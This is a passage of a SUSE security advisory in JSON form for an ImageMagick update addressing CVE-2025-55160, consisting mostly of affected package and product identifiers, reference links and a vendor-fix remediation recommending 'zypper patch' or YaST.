"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-55160",
"url": "https://www.suse.com/security/cve/CVE-2025-55160"
},
{
"category": "external",
"summary": "SUSE Bug 1248079 for CVE-2025-55160",
"url": "https://bugzilla.suse.com/1248079"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
